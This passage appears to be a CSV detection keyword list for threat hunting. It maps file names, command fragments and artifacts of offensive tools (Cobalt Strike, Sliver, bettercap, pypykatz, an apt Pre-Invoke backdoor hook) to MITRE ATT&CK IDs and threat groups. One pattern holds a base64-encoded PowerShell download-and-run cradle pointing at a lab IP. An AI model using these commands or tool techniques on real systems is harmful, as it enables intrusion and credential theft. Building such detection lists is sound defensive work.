john*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*apt/etumbot.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*apt/putterpanda.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*APT::Update::Pre-Invoke *}*,greyware_tool_keyword,APT,linux commands abused by attackers - backdoor apt execute a command when invoking apt,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*apt1_virtuallythere.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*APT64/EternalHushFramework*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*apt-get -y install tor *,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,0,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*APTortellini/unDefender*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*APTSimulator*,offensive_tool_keyword,APTSimulator,APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.,T1036 - T1059 - T1562 - T1027 - T1003,TA0001 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/NextronSystems/APTSimulator,1,1,N/A,N/A,10,2272,414,2023-06-16T08:48:25Z,2018-02-03T14:19:42Z -*apypykatz.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*aquatone*,offensive_tool_keyword,aquatone,Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.,T1590 - T1553 - T1002 - T1083 - T1313,TA0009 - TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/michenriksen/aquatone,1,0,N/A,N/A,10,5265,876,2022-05-22T19:49:32Z,2015-11-19T11:30:12Z -*archerysec*,offensive_tool_keyword,archerysec,Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.,T1190 - T1082 - T1518,TA0003 - TA0008,N/A,N/A,Frameworks,https://github.com/archerysec/archerysec,1,0,N/A,N/A,10,2135,507,2023-09-26T14:45:31Z,2017-12-04T12:42:54Z -*archive-*.kali.org/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ArchStrike*,offensive_tool_keyword,archstrike,Arch Linux repo containing lots of exploitation tools for pentesters,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://archstrike.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ares.py runserver*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*ares-master.zip*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,1,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*Args_Invoke_Kerberoast*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*armitage.exe*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*armory install *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install .net-execute*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install .net-pivot*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install .net-recon*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install situational-awareness*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install windows-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install windows-pivot*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*Arno0x/DBC2*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Arno0x/EmbedInHTML*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*Arno0x/WebDavC2*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*arp.spoof on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arp.spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arp.spoof.targets*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arp_spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arpspoof -i *,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*ArpSpoofer*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arpspoofing.py *,offensive_tool_keyword,arpspoofing,arp spoofing scripts,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/arpspoofing,1,0,N/A,N/A,1,15,1,2022-03-10T04:44:36Z,2021-06-29T22:57:51Z -*arsenal_kit.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact.cna*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact.x64.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact.x86.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact.x86.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact_payload*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*artifact_payload*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact_stageless*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 